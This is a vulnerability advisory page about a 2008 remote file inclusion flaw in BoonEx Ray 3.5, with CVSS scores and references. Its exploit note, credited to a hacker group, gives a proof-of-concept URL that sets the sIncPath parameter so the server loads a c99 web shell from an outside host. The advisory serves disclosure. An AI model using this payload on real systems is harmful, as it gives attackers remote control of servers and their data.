BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

2008.07.16
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Name Of Script : Ray # Version : 3.5 # Download From : http://get.boonex.com/Ray-v.3.5-Suite-Free # Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ] # My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ] # Type Of Exploit : RFI # POC : http://WwW.4RxH.CoM/ray.3.5/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt? # Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD # Note : No One Perfect :) # rXh # bEST wISHES

References:

http://www.milw0rm.com/exploits/6028
http://www.frsirt.com/english/advisories/2008/2033/references
http://secunia.com/advisories/30999


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top